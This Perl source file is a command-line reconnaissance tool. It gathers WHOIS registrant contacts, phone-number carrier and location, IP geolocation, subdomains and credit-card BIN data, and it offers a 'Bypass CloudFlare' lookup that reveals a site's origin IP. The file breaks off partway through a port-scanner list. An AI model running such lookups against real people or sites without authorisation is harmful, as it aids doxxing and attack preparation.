] | null | null | null | mr.4r.pl | batereck/lacak-orang | 2534950c41ad90ee23ca63c4aa82943b6907ed2a | [
"MIT"
] | null | null | null | #!/usr/bin/perl
use if $^O eq "MSWin32", Win32::Console::ANSI;
use Getopt::Long;
use HTTP::Request;
use LWP::UserAgent;
use IO::Select;
use HTTP::Headers;
use IO::Socket;
use HTTP::Response;
use Term::ANSIColor;
use HTTP::Request::Common qw(POST);
use HTTP::Request::Common qw(GET);
use URI::URL;
use IO::Socket::INET;
use Data::Dumper;
use LWP::Simple;
use JSON qw( decode_json encode_json );
my $ua = LWP::UserAgent->new;
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
GetOptions(
"h|help" => \$help,
"i|info=s" => \$site1,
"n|number=s" => \$PhoneNumber,
"mx|mailserver=s" => \$site2,
"w|whois=s" => \$site3,
"l|location=s" => \$site4,
"c|cloudflare=s" => \$site5,
"a|age=s" => \$site6,
"ua|useragent=s" => \$useragent,
"p|port=s" => \$target,
"b|bin=s" => \$bin,
"s|subdomain=s" => \$site8,
"e|email=s" => \$email,
"cms|cms=s" => \$site7,
);
if ($help) { banner();help(); }
if ($site1) { banner();Websiteinformation(); }
if ($PhoneNumber) { banner();Phonenumberinformation(); }
if ($site2) { banner();FindIPaddressandemailserver(); }
if ($site3) { banner();Domainwhoislookup(); }
if ($site4) { banner();Findwebsitelocation(); }
if ($site5) { banner();CloudFlare(); }
if ($site6) { banner();DomainAgeChecker(); }
if ($useragent) { banner();UserAgent(); }
if ($bin) { banner();BIN(); }
if ($site8) { banner();subdomain(); }
if ($email) { banner();email(); }
if ($site7) { banner();cms(); }
if ($target) { banner();port(); }
unless ($help|$site1|$PhoneNumber|$site2|$site3|$site4|$site5|$site6|$useragent|$bin|$email|$site7|$site8|$target) { banner();menu(); }
##### Help #######
sub help {
print item('1'),"Website Information ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -i example.com\n";
print item('2'),"Phone Number Information ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -n xxxxxxx\n";
print item('3'),"Find IP Address And E-mail Server ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -mx example.com\n";
print item('4'),"Domain Whois Lookup ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -w example.com\n";
print item('5'),"Find Website/IP Address Location ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -l example.com\n";
print item('6'),"Bypass CloudFlare ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -c example.com\n";
print item('7'),"Domain Age Checker ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -a example.com\n";
print item('8'),"User Agent Info ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -ua Mozilla/5.0 xxxxxxxxxxxxxxxxxxxx\n";
print item('9'),"Check Active Services On Resource";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -p 127.0.0.1\n";
print item('10'),"Credit Card Bin Checker ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -b 123456\n";
print item('11'),"Subdomain Scanner ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -s example.com\n";
print item('12'),"E-mail Address Checker ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -e example@gmail.com\n";
print item('13'),"Content Management System Checker ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -cms example.com\n";
}
##### Banner #######
sub banner {
if ($^O =~ /MSWin32/) {system("mode con: cols=100 lines=29");system("cls"); }else { system("resize -s 28 87");system("clear"); }
print " ,;;;, \n";
print " ;;;;;;; \n";
print " .- `\\, '/_ _____ _ ";
print color('bold red'),"____";
print color('reset');
print " _ _ \n";
print " .' \\ (`(_) |_ _| |_ ";
print color('bold red'),"|__ /";
print color('reset');
print " (_)_ _ ____ __ ___ __| |_ ___ _ _ \n";
print " / `-,. \\ \\_/ | | | ' \\ ";
print color('bold red'),"|_ \\";
print color('reset');
print "\ | | ' \\(_-< '_ \\/ -_) _| _/ _ \\ '_| \n";
print " \\ \\/ \\ `--` |_| |_||_|";
print color('bold red'),"___/";
print color('reset');
print " |_|_||_/__/ .__/\\___\\__|\\__\\___/_| ";
print color('bold green'),"V 1.9\n";
print color('reset');
print " \\ \\ \\ \033[0;31m[\033[0;33m127.0.0.1\033[0;31m] \033[0;37m|_|\033[0;31m [\033[1;34m192.168.1.1\033[0;31m] \033[0;37m\n";
print " / /| | \033[0;31m[\033[0;37mCoded BY Mr.4r-batereck\033[0;31m]\033[0;37m\n";
print " /_/ |_| \n";
print " ( _\\ ( _\\ #:## #:##\n";
print " #:## \n\n";
}
##### Menu #######
sub menu {
print item('01'),"Website Information\n";
print item('02'),"Phone Number Information\n";
print item('03'),"Find IP Address And E-mail Server\n";
print item('04'),"Domain Whois Lookup\n";
print item('05'),"Find Website/IP Address Location\n";
print item('06'),"Bypass CloudFlare\n";
print item('07'),"Domain Age Checker\n";
print item('08'),"User Agent Info\n";
print item('09'),"Check Active Services On Resource\n";
print item('10'),"Credit Card Bin Checker\n";
print item('11'),"Subdomain Scanner\n";
print item('12'),"Check E-mail Address\n";
print item('13'),"Content Management System Checker\n";
print item('14'),"Update\n\n";
print item('-'),"Choose : ";
print color('reset');
chomp($number=<STDIN>);
if($number eq '01'){
banner();
print item(),"Enter Website : ";
chomp($site1=<STDIN>);
banner();
Websiteinformation();
enter();
}if($number eq '02'){
banner();
print item(),"Enter Phone Number : +";
chomp($PhoneNumber=<STDIN>);
banner();
Phonenumberinformation();
enter();
}if($number eq '03'){
banner();
print item(),"Enter Website : ";
chomp($site2=<STDIN>);
banner();
FindIPaddressandemailserver();
enter();
}if($number eq '04'){
banner();
print item(),"Enter Website : ";
chomp($site3=<STDIN>);
banner();
Domainwhoislookup();
enter();
}if($number eq '05'){
banner();
print item(),"Enter Website/IP : ";
chomp($site4=<STDIN>);
banner();
Findwebsitelocation();
enter();
}if($number eq '06'){
banner();
print item(),"Enter Website : ";
chomp($site5=<STDIN>);
banner();
CloudFlare();
enter();
}if($number eq '07'){
banner();
print item(),"Enter Website : ";
chomp($site6=<STDIN>);
banner();
DomainAgeChecker();
enter();
}if($number eq '08'){
banner();
print item(),"Enter User Agent : ";
chomp($useragent=<STDIN>);
my $find = "/";
my $replace = "%2F";
$find = quotemeta $find;
$useragent =~ s/$find/$replace/g;
$useragent =~ s/ /+/g;
banner();
UserAgent();
enter();
}if($number eq '09'){
banner();
port();
enter();
}if($number eq '10'){
banner();
print item(),"Enter First 6 Digits Of A Credit Card Number : ";
chomp($bin=<STDIN>);
banner();
BIN();
enter();
}if($number eq '11'){
banner();
print item(),"Enter website: ";
chomp($site8=<STDIN>);
banner();
subdomain();
enter();
}if($number eq '12'){
banner();
print item(),"Enter E-mail : ";
chomp($email=<STDIN>);
banner();
email();
enter();
}if($number eq '13'){
banner();
print item(),"Enter website: ";
chomp($site7=<STDIN>);
banner();
cms();
enter();
}if($number eq '14'){
update();
}
}
####### Website information #######
sub Websiteinformation {
$url = "https://myip.ms/$site1";
$request = $ua->get($url);
$response = $request->content;
if($response =~/> (.*?) visitors per day </)
{
print item(),"Hosting Info for Website: $site1\n";
print item(),"Visitors per day: $1 \n";
if($response =~/> (.*?) visitors per day on (.*?)</){
print item(),"Visitors per day: $1 \n";
}
$ip= (gethostbyname($site1))[4];
my ($a,$b,$c,$d) = unpack('C4',$ip);
$ip_address ="$a.$b.$c.$d";
print item(),"IP Address: $ip_address\n";
if($response =~/IPv6.png'><a href='\/info\/whois6\/(.*?)'>/)
{
$ipv6_address=$1;
print item(),"Linked IPv6 Address: $ipv6_address\n";
}
if($response =~/IP Location: <\/td> <td class='vmiddle'><span class='cflag (.*?)'><\/span><a href='\/view\/countries\/(.*?)\/Internet_Usage_Statistics_(.*?).html'>(.*?)<\/a>/)
{
$Location=$1;
print item(),"IP Location: $Location\n";
}
if($response =~/IP Reverse DNS (.*?)<\/b><\/div><div class='sval'>(.*?)<\/div>/)
{
$host=$2;
print item(),"IP Reverse DNS (Host): $host\n";
}
if($response =~/Hosting Company: <\/td><td valign='middle' class='bold'> <span class='nounderline'><a title='(.*?)'/)
{
$ownerName=$1;
print item(),"Hosting Company: $ownerName\n";
}
if($response =~/Hosting Company \/ IP Owner: <\/td><td valign='middle' class='bold'> <span class='cflag (.*?)'><\/span> <a href='\/view\/web_hosting\/(.*?)'>(.*?)<\/a>/)
{
$ownerip=$3;
print item(),"Hosting Company IP Owner: $ownerip\n";
}
if($response =~/Hosting Company \/ IP Owner: <\/td><td valign='middle' class='bold'> <span class='nounderline'><a title='(.*?)'/)
{
$ownerip=$1;
print item(),"Hosting Company IP Owner: $ownerip\n";
}
if($response =~/IP Range <b>(.*?) - (.*?)<\/b><br>have <b>(.*?)<\/b>/)
{
print item(),"Hosting IP Range: $1 - $2 ($3 ip) \n";
}
if($response =~/Hosting Address: <\/td><td>(.*?)<\/td><\/tr>/)
{
$address=$1;
print item(),"Hosting Address: $address\n";
}
if($response =~/Owner Address: <\/td><td>(.*?)<\/td>/)
{
$addressowner=$1;
print item(),"Owner Address: $addressowner\n";
}
if($response =~/Hosting Country: <\/td><td><span class='cflag (.*?)'><\/span><a href='\/view\/countries\/(.*?)\/(.*?)'>(.*?)<\/a>/)
{
$HostingCountry=$1;
print item(),"Hosting Country: $HostingCountry\n";
}
if($response =~/Owner Country: <\/td><td><span class='cflag (.*?)'><\/span><a href='\/view\/countries\/(.*?)\/(.*?)'>(.*?)<\/a>/)
{
$OwnerCountry=$1;
print item(),"Owner Country: $OwnerCountry\n";
}
if($response =~/Hosting Phone: <\/td><td>(.*?)<\/td><\/tr>/)
{
$phone=$1;
print item(),"Hosting Phone: $phone\n";
}
if($response =~/Owner Phone: <\/td><td>(.*?)<\/td><\/tr>/)
{
$Ownerphone=$1;
print item(),"Owner Phone: $Ownerphone\n";
}
if($response =~/Hosting Website: <img class='cursor-help noprint left10' border='0' width='12' height='10' src='\/images\/tooltip.gif'><\/td><td><a href='\/(.*?)'>(.*?)<\/a><\/td>/)
{
$website=$1;
print item(),"Hosting Website: $website\n";
}
if($response =~/Owner Website: <img class='cursor-help noprint left10' border='0' width='12' height='10' src='\/(.*?)'><\/td><td><a href='\/(.*?)'>(.*?)<\/a>/)
{
$Ownerwebsite=$3;
print item(),"Owner Website: $Ownerwebsite\n";
}
if($response =~/CIDR:<\/td><td> (.*?)<\/td><\/tr>/)
{
$CIDR=$1;
print item(),"CIDR: $CIDR\n";
}
if($response =~/Owner CIDR: <\/td><td><span class='(.*?)'><a href="\/view\/ip_addresses\/(.*?)">(.*?)<\/a>\/(.*?)<\/span><\/td><\/tr>/)
{
print item(),"Owner CIDR: $3/$4\n\n";
}
if($response =~/Hosting CIDR: <\/td><td><span class='(.*?)'><a href="\/view\/ip_addresses\/(.*?)">(.*?)<\/a>\/(.*?)<\/span><\/td><\/tr>/)
{
print item(),"Hosting CIDR: $3/$4\n\n";
}
$url = "https://dns-api.org/NS/$site1";
$request = $ua->get($url);
$response = $request->content;
}else {
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website Working\n";
}
my %seen;
while($response =~m/"value": "(.*?)."/g)
{
$ns=$1;
next if $seen{$ns}++;
print item(),"NS: $ns \n";
}
}
### Phone number information ###########
sub Phonenumberinformation {
$url = "https://pastebin.com/raw/egbm0eEk";
$request = $ua->get($url);
$api2 = $request->content;
$url = "http://apilayer.net/api/validate?access_key=$api2&number=$PhoneNumber&country_code=&format=1";
$request = $ua->get($url);
$response = $request->content;
if($response =~/"valid":true/)
{
$valid=$1;
print item(),"Valid : ";
print color("bold green"),"true\n";
if($response =~/local_format":"(.*?)"/)
{
$localformat=$1;
print item(),"Local Format : $localformat\n";
}
if($response =~/international_format":"(.*?)"/)
{
$international_format=$1;
print item(),"International Format : $international_format\n";
}
if($response =~/country_name":"(.*?)"/)
{
$country_name=$1;
print item(),"Country : $country_name\n";
}
if($response =~/location":"(.*?)"/)
{
$location=$1;
print item(),"Location : $location\n";
}
if($response =~/carrier":"(.*?)"/)
{
$carrier=$1;
print item(),"Carrier : $carrier\n";
}
if($response =~/line_type":"(.*?)"/)
{
$line_type=$1;
print item(),"Line Type : $line_type\n";
}
}else {
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Phone Number Without +/00\n";
print item('3'),"Check If Phone Number Exists\n";
exit
}
}
### Find IP address and email server ###########
sub FindIPaddressandemailserver {
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0");
my $url = "https://dns-api.org/MX/$site2";
$request = $ua->get($url);
$response = $request->content;
if ($response =~ /error/){
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website Working\n";
exit
}
print item(),"Domain name for MX records: $site2\n\n";
my %seen;
while($response =~m/"value": "(.*?)."/g)
{
$mx=$1;
next if $seen{$mx}++;
print item(),"MX: $mx \n";
}
}
### Domain whois lookup ###########
sub Domainwhoislookup {
$url = "https://pastebin.com/raw/YfHdX0jE";
$request = $ua->get($url);
$api4 = $request->content;
$url = "http://www.whoisxmlapi.com//whoisserver/WhoisService?domainName=$site3&username=$api4&outputFormat=JSON";
$request = $ua->get($url);
$response = $request->content;
my $responseObject = decode_json($response);
if (exists $responseObject->{'WhoisRecord'}->{'createdDate'}){
print item(),"Whois lookup for : $site3 \n";
print item(),'Created date: ',
$responseObject->{'WhoisRecord'}->{'createdDate'},"\n";sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'expiresDate'}){
print item(),'Expires date: ',
$responseObject->{'WhoisRecord'}->{'expiresDate'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'contactEmail'}){
print item(),'Contact email: ',
$responseObject->{'WhoisRecord'}->{'contactEmail'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'registrant'}->{'name'}){
print item(),'Registrant Name: ',
$responseObject->{'WhoisRecord'}->{'registrant'}->{'name'},"\n";} sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'registrant'}->{'organization'}){
print item(),'Registrant Organization: ',
$responseObject->{'WhoisRecord'}->{'registrant'}->{'organization'},"\n";} sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'registrant'}->{'street1'}){
print item(),'Registrant Street: ',
$responseObject->{'WhoisRecord'}->{'registrant'}->{'street1'},"\n";} sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'registrant'}->{'city'}){
print item(),'Registrant City: ',
$responseObject->{'WhoisRecord'}->{'registrant'}->{'city'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'registrant'}->{'state'}){
print item(),'Registrant State/Province: ',
$responseObject->{'WhoisRecord'}->{'registrant'}->{'state'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'registrant'}->{'postalCode'}){
print item(),'Registrant Postal Code: ',
$responseObject->{'WhoisRecord'}->{'registrant'}->{'postalCode'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'registrant'}->{'country'}){
print item(),'Registrant Country: ',
$responseObject->{'WhoisRecord'}->{'registrant'}->{'country'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'registrant'}->{'email'}){
print item(),'Registrant Email: ',
$responseObject->{'WhoisRecord'}->{'registrant'}->{'email'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'registrant'}->{'telephone'}){
print item(),'Registrant Phone: ',
$responseObject->{'WhoisRecord'}->{'registrant'}->{'telephone'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'registrant'}->{'fax'}){
print item(),'Registrant Fax: ',
$responseObject->{'WhoisRecord'}->{'registrant'}->{'fax'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'name'}){
print item(),'Admin Name: ',
$responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'name'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'organization'}){
print item(),'Admin Organization: ',
$responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'organization'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'street1'}){
print item(),'Admin Street: ',
$responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'street1'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'city'}){
print item(),'Admin City: ',
$responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'city'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'state'}){
print item(),'Admin State/Province: ',
$responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'state'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'postalCode'}){
print item(),'Admin Postal Code: ',
$responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'postalCode'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'country'}){
print item(),'Admin Country: ',
$responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'country'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'email'}){
print item(),'Admin Email: ',
$responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'email'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'telephone'}){
print item(),'Admin Phone: ',
$responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'telephone'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'fax'}){
print item(),'Admin Fax: ',
$responseObject->{'WhoisRecord'}->{'administrativeContact'}->{'fax'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'technicalContact'}->{'name'}){
print item(),'Tech Name: ',
$responseObject->{'WhoisRecord'}->{'technicalContact'}->{'name'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'technicalContact'}->{'organization'}){
print item(),'Tech Organization: ',
$responseObject->{'WhoisRecord'}->{'technicalContact'}->{'organization'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'technicalContact'}->{'street1'}){
print item(),'Tech Street: ',
$responseObject->{'WhoisRecord'}->{'technicalContact'}->{'street1'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'technicalContact'}->{'city'}){
print item(),'Tech City: ',
$responseObject->{'WhoisRecord'}->{'technicalContact'}->{'city'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'technicalContact'}->{'state'}){
print item(),'Tech State/Province: ',
$responseObject->{'WhoisRecord'}->{'technicalContact'}->{'state'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'technicalContact'}->{'postalCode'}){
print item(),'Tech Postal Code: ',
$responseObject->{'WhoisRecord'}->{'technicalContact'}->{'postalCode'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'technicalContact'}->{'country'}){
print item(),'Tech Country: ',
$responseObject->{'WhoisRecord'}->{'technicalContact'}->{'country'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'technicalContact'}->{'email'}){
print item(),'Tech Email: ',
$responseObject->{'WhoisRecord'}->{'technicalContact'}->{'email'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'technicalContact'}->{'telephone'}){
print item(),'Tech Phone: ',
$responseObject->{'WhoisRecord'}->{'technicalContact'}->{'telephone'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'technicalContact'}->{'fax'}){
print item(),'Tech Fax: ',
$responseObject->{'WhoisRecord'}->{'technicalContact'}->{'fax'},"\n";}sleep(1);
}else {
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website Working\n";
}
}
### Find website location ###########
sub Findwebsitelocation {
$ip= (gethostbyname($site4))[4];
my ($a,$b,$c,$d) = unpack('C4',$ip);
$ip ="$a.$b.$c.$d";
$url = "https://ipapi.co/$ip/json/";
$request = $ua->get($url);
$response = $request->content;
if($response =~/country_name": "(.*?)"/){
print item(),"IP Address: $ip\n";
print item(),"Country: $1\n";
if($response =~/city": "(.*?)"/){
print item(),"City: $1\n";
}if($response =~/region": "(.*?)"/){
print item(),"Region: $1\n";
}if($response =~/region_code": "(.*?)"/){
print item(),"Region Code: $1\n";
}if($response =~/continent_code": "(.*?)"/){
print item(),"Continent Code: $1\n";
}if($response =~/postal": "(.*?)"/){
print item(),"Postal Code: $1\n";
}if($response =~/latitude": (.*?),/){
print item(),"Latitude / Longitude: $1, ";
}if($response =~/longitude": (.*?),/){
print color("bold white"),"$1\n";
}if($response =~/timezone": "(.*?)"/){
print item(),"Timezone: $1\n";
}if($response =~/utc_offset": "(.*?)"/){
print item(),"Utc Offset: $1\n";
}if($response =~/country_calling_code": "(.*?)"/){
print item(),"Calling Code: $1\n";
}if($response =~/currency": "(.*?)"/){
print item(),"Currency: $1\n";
}if($response =~/languages": "(.*?)"/){
print item(),"Languages: $1\n";
}if($response =~/asn": "(.*?)"/){
print item(),"ASN: $1\n";
}if($response =~/org": "(.*?)"/){
print item(),"ORG: $1\n";
}
}else {
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website/IP Working\n";
}
}
### Bypass CloudFlare ###########
sub CloudFlare {
my $ua = LWP::UserAgent->new;
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
$ip= (gethostbyname($site5))[4];
my ($a,$b,$c,$d) = unpack('C4',$ip);
$ip_address ="$a.$b.$c.$d";
if($ip_address =~ /[0-9]/){
print item(),"CloudFlare IP: $ip_address\n\n";
}
$url = "https://dns-api.org/NS/$site5";
$request = $ua->get($url);
$response = $request->content;
my %seen;
while($response =~m/"value": "(.*?)."/g)
{
$ns=$1;
next if $seen{$ns}++;
print item(),"NS: $ns \n";
}
print color("bold white"),"\n";
$url = "http://www.crimeflare.us/cgi-bin/cfsearch.cgi";
$request = POST $url, [cfS => $site5];
$response = $ua->request($request);
$riahi = $response->content;
if($riahi =~m/">(.*?)<\/a> /g){
print item(),"Real IP: $1\n";
$ip=$1;
}elsif($riahi =~m/not CloudFlare-user nameservers/g){
print item(),"These Are Not CloudFlare-user Nameservers !!\n";
print item(),"This Website Not Using CloudFlare Protection\n";
}elsif($riahi =~m/No direct-connect IP address was found for this domain/g){
print item(),"No Direct Connect IP Address Was Found For This Domain\n";
}else{
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website Working\n";
}
$url = "http://ipinfo.io/$ip/json";
$request = $ua->get($url);
$response = $request->content;
if($response =~m/hostname": "(.*?)"/g){
print item(),"Hostname: $1\n";
}if($response =~m/city": "(.*?)"/g){
print item(),"City: $1\n";
}if($response =~m/region": "(.*?)"/g){
print item(),"Region: $1\n";
}if($response =~m/country": "(.*?)"/g){
print item(),"Country: $1\n";
}if($response =~m/loc": "(.*?)"/g){
print item(),"Location: $1\n";
}if($response =~m/org": "(.*?)"/g){
print item(),"Organization: $1\n";
}
}
### User Agent Info ###########
sub UserAgent {
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
$url = "https://pastebin.com/raw/pTXVQiuJ";
$request = $ua->get($url);
$api8 = $request->content;
$url = "https://useragentapi.com/api/v4/json/$api8/$useragent";
$request = $ua->get($url);
$response = $request->content;
if($response =~m/ua_type":"(.*?)"/g){
print item(),"User Agent Type: $1\n";
if($response =~m/os_name":"(.*?)"/g){
print item(),"OS name: $1\n";
}if($response =~m/os_version":"(.*?)"/g){
print item(),"OS version: $1\n";
}if($response =~m/browser_name":"(.*?)"/g){
print item(),"Browser name: $1\n";
}if($response =~m/browser_version":"(.*?)"/g){
print item(),"Browser version: $1\n";
}if($response =~m/engine_name":"(.*?)"/g){
print item(),"Engine name: $1\n";
}if($response =~m/engine_version":"(.*?)"/g){
print item(),"Engine version: $1\n";
}
}else{
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Check If User Agent Exists\n";
}
}
### Domain Age Checker ###########
sub DomainAgeChecker {
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
$url = "https://input.payapi.io/v1/api/fraud/domain/age/$site6";
$request = $ua->get($url);
$response = $request->content;
if($response =~m/is (.*?) days (.*?) Date: (.*?)"/g){
$days=$1;
$created=$3;
print item(),"Domain Name : $site6\n";
print item(),"Domain Created on : $created\n";
$url = "http://unitconverter.io/days/years/$days";
$request = $ua->get($url);
$response = $request->content;
if($response =~m/<strong style="color:red"> = (.*?)<\/strong><\/p>/g){
$age=$1;
$age =~ s/ / /g;
print item(),"Domain Age : $age\n";
}
}else{
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website Working\n";
}
}
######################## Credit card BIN number Check ################################
sub BIN {
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
$url = "https://lookup.binlist.net/$bin";
$request = $ua->get($url);
$response = $request->content;
if($response =~/scheme/){
print color('bold red')," [";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"Credit card BIN number: $bin XX XXXX XXXX\n";
if($response =~/scheme":"(.*?)"/){
print color('bold red')," [";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"Credit card brand: $1\n";
}if($response =~/type":"(.*?)"/){
print color('bold red')," [";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"Type: $1\n";
}if($response =~/name":"(.*?)"/){
print color('bold red')," [";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"Bank: $1\n";
}if($response =~/url":"(.*?)"/){
print color('bold red')," [";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"Bank URL: $1\n";
}if($response =~/phone":"(.*?)"/){
print color('bold red')," [";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"Bank Phone: $1\n";
}if($response =~/alpha2":"(.*?)","name":"(.*?)"/){
print color('bold red')," [";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"Country Short: $1\n";
print color('bold red')," [";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"Country: $2\n";
}if($response =~/latitude":"(.*?)"/){
print color('bold red')," [";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"Latitude: $1\n";
}if($response =~/longitude":"(.*?)"/){
print color('bold red')," [";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"Longitude: $1\n";
}
}else{
print color('bold red')," [";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"There Is A Problem\n\n";
print color('bold red')," [";
print color('bold green'),"1";
print color('bold red'),"] ";
print color("bold white"),"Checking The Connection\n";
print color('bold red')," [";
print color('bold green'),"2";
print color('bold red'),"] ";
print color("bold white"),"Enter Only First 6 Digits Of A Credit Card Number\n";
}
}
####### Subdomain Scanner #######
sub subdomain {
$url = "https://www.pagesinventory.com/search/?s=$site8";
$request = $ua->get($url);
$response = $request->content;
$ip= (gethostbyname($site8))[4];
my ($a,$b,$c,$d) = unpack('C4',$ip);
$ip_address ="$a.$b.$c.$d";
if($response =~ /Search result for/){
print item(),"Website: $site8\n";
print item(),"IP: $ip_address\n\n";
while($response =~ m/<td><a href=\"\/domain\/(.*?).html\">(.*?)<a href="\/ip\/(.*?).html">/g ) {
print item(),"Subdomain: $1\n";
print item('-'),"IP: $3\n\n";
sleep(1);
}
}elsif($ip_address =~ /[0-9]/){
if($response =~ /Nothing was found/){
print item(),"Website: $site8\n";
print item(),"IP: $ip_address\n\n";
print item(),"No Subdomains Found For This Domain\n";
}}else {
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website Working\n";
}
}
####### Port scanner #######
sub port {
print item(),"Enter Website/IP : ";
chop ($target = <stdin>);
$| = 1;
print "\n";
print item(),"PORT STATE SERVICE\n";
my %ports = (
21 => 'FTP'
,22 => 'SSH'
,23 => 'Telnet'
,25 => 'SMTP'
,43 => 'Whois'
,53 => 'DNS'
,68 => 'DHCP'
,80 => 'HTTP'
,110 => 'POP3'
,115 => 'SFTP'
,119 => 'NNTP'
,123 => 'NTP'
,139 => 'NetBIOS'
,143 => 'IMAP'
,161 => 'SNMP'
,220 => 'IMAP3'
,389 => 'LDAP'
,443 => 'SSL'
